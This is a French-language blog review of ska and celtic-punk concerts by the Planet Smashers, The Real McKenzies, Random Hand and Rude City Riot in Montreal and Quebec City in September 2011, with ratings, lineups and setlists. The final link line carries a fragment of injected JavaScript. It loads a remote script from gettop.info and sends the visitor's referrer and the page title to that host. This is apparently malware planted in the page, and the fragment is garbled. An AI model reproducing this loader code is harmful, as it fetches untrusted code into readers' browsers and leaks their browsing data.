Show de Planet Smashers + The Real McKenzies + Random Hand + Rude City Riot au Club Soda à Montréal (24 septembre 2011) et à l’Agitée de Québec (22 septembre 2011)


Facebooktwitterredditpinterestlinkedinmail

THE PLANET SMASHERS (7.5/10)

Comme à l’habitude et comme mes dernières critiques du groupe l’indiquent, mes réflexions ne changent pas; ils donnent un excellent show, idéal pour danser, mais rien de différent de tous les spectacles que j’ai vu d’eux. La seule différence est qu’à la fin plusieurs personnes, dont tous les joueurs de cuivres des formations précédentes ont embarqué sur la scène. On a même pu apercevoir des membres de The Brains. En ce qui concerne le setlist, c’était le même que les dernières années à l’exception des nouvelles chansons qui sont ajoutées depuis la sortie de l’album Descent Into The Valley Of The Planet Smashers dont, The Hippopotamus, Looking Good, Happy New Year’s, My Obsession et Food Fight!!. Pour plus d’informations sur les Planet Smashers de Montréal et/ou pour avoir une idée du setlist, vous pouvez consulter ce lien: http://ultimradio.com/planetsmashers-dreadnoughts-resignators/
 

http://www.myspace.com/planetsmashers

http://www.planetsmashers.net

 

THE REAL MCKENZIES (7/10)

(Pour les fans de Flatfoot 56, Flogging Molly, Dropkick Murphys, The Tossers, Street Dogs)

La formation canadienne de punk celtique a pris naissance presque vingt années plus tôt. Effectivement, les se sont formés à Vancouver en 1992. Plusieurs membres font partie intégrante de ce groupe d’hommes en kilt, dont Paul McKenzie (vocal), Kurt Robertson (vocal et guitare), Gord Taylor (cornemuse), Sean Sellers (batterie), Mark Boland (vocal et guitare) et Gwomper (basse). Jusqu’à maintenant, le band à un bon éventail de disques produits. Parmi ceux-ci, on retrouve Real McKenzies (1995), Clash of the Tartans (2000), Loch’d and Loaded (2001), Pissed Tae Th’ Gills (2002 – Live), Oot & Aboot (2003) et leurs trois derniers disques signés sur Fat Wreck Chords soit 10,000 Shots (2005), Off the Leash (2008), ainsi que Shine not Burn (2010 – Live). Les McKenzies donnent toujours un bon show, même si personnellement leur musique me rejoint plus ou moins. Ce n’est pas un groupe que je vais écouter les albums chez moi en boucle, mais je dois dire qu’en spectacle, ils sont vraiment excellents. Un peu clowns, un peu fous, bref des hommes de partys. De plus, ils savent comment faire lever la foule et quand je dis ceci, ça n’a absolument rien à voir avec un stage dive particulier, une couple d’années auparavant, fait par un homme complètement nu dans un certain show à l’Impérial de Québec. Peu importe, ceci ne s’est pas reproduit, heureusement pour nous les spectateurs. On a eu le droit à certains moments qui nous ont prouvé qu’effectivement, les hommes en kilt n’ont pas de sous-vêtement et se plaisent dans la simplicité de la nudité. Mise à part cette constatation, les McKenzies nous ont joué un setlist qui était tout à fait interminable à Québec et semblable à Montréal en version plus courte évidemment, étant donné qu’ils n’étaient pas la tête d’affiche dans la région métropolitaine.

http://www.myspace.com/therealmckenziess

 

RANDOM HAND (10/10)

(Pour les fans de Voodoo Glow Skulls, The JB Conspiracy)

Probablement une de mes meilleures découvertes de l’année, du moins dans mon top 3. Ce groupe d’Angleterre, formé en 2002, joue du punk-ska avec des tonalités plutôt agressives. J’ai de la misère à croire que j’ai pu passer à côté de ce groupe durant neuf années; ce n’est presque pas croyable. Une chose est sûre, c’est que lorsqu’ils font des spectacles, ils sont loin de passer inaperçus. Le plus que talentueux chanteur et tromboniste, Robin Leitch, m’en a mit plein la vue et je ne devais pas être la seule. Non mais, quel souffle! Un gars avec une énergie totalement débordante, entraînante voire presque qu’essouflante. Quand il ne chante pas, il joue du trombone et sinon il saute partout. Si on avait à écrire un livre sur comment donner un show spectaculaire, je le paierais en tant qu’écrivain. N’enlevons pas le mérite aussi à ses confrères tout aussi talentueux mais un peu plus effacés, quoique tout de même présents, Joe Tilston (voix et basse), Matthew Crosher (voix et guitare) et Sean Howe (batterie). Suite à mon éblouissement et mon admiration pour le groupe, j’ai donc acheté les trois cds disponibles, soit Inhale/Exhale (2009 – sur Rebel Alliance Records), Another Change of Plan (2010 – sur Riot Music) et le trésor qu’est Seething Is Believing (2011 – sur Bomber Music). Ils ont joué sensiblement le même set à Québec et à Montréal, mise à part 2-3 chansons. Les chansons du set que je me rappelle sont Tales Of Intervention, Anger Management, Not A Number (seulement à Québec), Three From Six, Floating Ghosts, Bones, Find What’s Out There, et I, Human. Bref, que du positif à dire sur cette formation  plus que formidable qui m’a totalement surprise et chavirée.

http://www.myspace.com/randomhand

 

RUDE CITY RIOT (8/10)

(Pour les fans de Nobody Cares, Lauriet Aitken, Subrosa Union, DPR)

Cette formation canadienne de Vancouver a également donné un très bon spectacle. Ce groupe ska/reggae qu’eux qualifie de « power ska », signé sur l’étiquette de Stomp Records est composé de plusieurs personnes dont Dustin Lionhart III (vocal), Scott Atkins (guitare), Steffen Peter (guitare), Erik Nielsen (basse), Kevin Tang (trombone), Jonny McCormack (saxophone), Sean Kight (batterie) et Peter Bowles (clavier). Jusqu’à maintenant, le groupe possède deux disques, soit Rude City Riot (2008) et Nothing But Time, le petit dernier qui a émergé en 2011. De mémoire, je dirais que le setlist de Québec et de Montréal était le même, car à ma seconde assistance, c’est-à-dire lors du show de Montréal, je reconnaissais et connaissais même presque toutes les chansons. D’ailleurs leurs compositions sont vraiment « catchy », c’est-à-dire qu’elles sont très accrochantes. Dès la première écoute, on enregistre assez rapidement les paroles et sommes capables de chanter avec eux à la deuxième écoute. La prestation du groupe était très bonne en général, mais je fais mention d’honneur surtout au saxophoniste Jonny qui selon moi est non seulement une bête de scène, mais aussi une captivation en soi et il déborde de talent. En résumé, il a volé le show tout simplement. Parmi les chansons qu’ils ont jouées, on retrouve Dc Riot Stomp, Bonnie & Clyde, Rudies Don’t Care, Shots And Pills, Imposter Man, Sally Brown (Cover de Lauriel Aitken), Don’t Go Away, Victoria et 25 Years.

http://www.rudecityriotsquad.com/fr_home.cfm

http://www.myspace.com/rudecityriots.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous R.E.M: C'est terminé après 30 ans de carririère!
Next Metallica et Lou Reed: Premier extrait "The View"

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *